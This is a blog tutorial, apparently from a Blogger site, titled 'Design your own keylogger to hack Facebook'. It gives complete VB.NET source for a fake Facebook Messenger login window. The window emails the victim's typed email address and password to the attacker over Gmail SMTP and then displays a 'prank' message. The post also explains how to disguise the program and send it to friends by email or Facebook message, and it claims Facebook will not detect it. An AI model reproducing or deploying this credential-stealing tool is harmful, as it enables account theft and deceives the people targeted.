Related Posts Plugin for WordPress, Blogger...
Powered by Blogger.

Design your own keylogger to hack Facebook

Hi guys today in this article we're going to design our own simple keylogger to hack Facebook.
For this you need "Visual Studio 2010" which you can Download Here 

Why make your own keylogger ?

There are tons of tricks on internet to hack Facebook but many times we fail because either the trick is fake or we make mistakes. For a novice who don't know anything about hacking this is a best way.

What this keylogger can do?

Send it to a person by e-mail or attach it on Facebook message.Your background message to cover the true nature of your keylogger will be "Hey try this new Facebook Messenger its awesome." So when a person will use this keylogger and will try to log in their account than it will give a message that it was just a prank and you got fooled by it. On the other hand their E-mail ID and Password will be mailed on your E-mail ID

Note :- Before we begin be sure to have Microsoft net-framework 4 installed on your computer. And Read Full article or else you won't understand anything. And for those who haven't touched visual basic in their life see Youtube videos to learn basic.


This is how your keylogger should look. You can download the blue background from Google.
So now lets begin -

Things you will need

2 Text boxes
2 Buttons
9 Lables
1 Check box
1 Blue background wallpaper
And a Facebook icon.

Try that your design should look almost real or it should give the feel that its real. Or take the reference from this image above and then make it.
Here's the code

Note :- The things highlighted on the image are all links of all "Facebook Pages" And don't forget to read the highlighted red text in middle of the code.

Imports System.Net.Mail
Public Class Form1

    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
          Dim MyMailMessage As New MailMessage()
        Try
            MyMailMessage.From = New MailAddress("coolhackers999@gmail.com")
            MyMailMessage.To.Add("coolhackers999@gmail.com")
            MyMailMessage.Subject = TextBox1.Text
            MyMailMessage.Body = TextBox2.Text
            Dim SMTP As New SmtpClient("smtp.gmail.com")
            SMTP.Port = 587
            SMTP.EnableSsl = True
            SMTP.Credentials = New System.Net.NetworkCredential("Your E-mail ID", "Your password")
(Here in the place of "Your E-mail ID and Your Password" You have to put your real e-mail id and password. That's because when the victim will try to login their ID and Password will be mailed to your ID So its necessary to put your ID and Password)
            SMTP.Send(MyMailMessage)
            TextBox2.Text = ""
            MsgBox("This is just a prank, and you got fooled by me easily :-P :-P Thanks for your support").ToString()
        Catch ex As Exception
        End Try
    End Sub

    Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
        System.Diagnostics.Process.Start("https://www.facebook.com/r.php?locale=en_US&loxv=v1_WITH_RULE")
    End Sub

    Private Sub Label4_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Label4.Click
        System.Diagnostics.Process.Start("https://www.facebook.com/login/identify?ctx=recover")
    End Sub

    Private Sub Label6_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Label6.Click
        System.Diagnostics.Process.Start("https://www.facebook.com/pages/create.php")
    End Sub

    Private Sub Label7_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Label7.Click
        System.Diagnostics.Process.Start("http://www.facebook.com/policies/?ref=pf")
    End Sub

    Private Sub Label8_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Label8.Click
        System.Diagnostics.Process.Start("http://www.facebook.com/facebook")
    End Sub

    Private Sub Label9_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Label9.Click
        System.Diagnostics.Process.Start("http://www.facebook.com/help/?ref=pf")
    End Sub
End Class
 For those who haven't use visual basic, Learn basics using Youtube Videos. Because explaining here will make no point its better to see some practical videos rather than reading the guide of how to use it.

Advantages :-

1. "Facebook" won't be able to detect your keylogger as Hacking program
2. Keylogger works 100%

Disadvantages

1. Your victim should have "Microsoft Net-framework 4" installed on his computer. Programs made from visual basic need Net-framework 4.

2. Most of the time it happens that you get failed to make your keylogger as real messenger Or it won't give a feel that its real messenger. So once when you send it to your friend by e-mail or by Facebook message by attaching it. Some people notice it easily that its fake. Well the image i gave you above is just a prototype.

No comments:

Post a Comment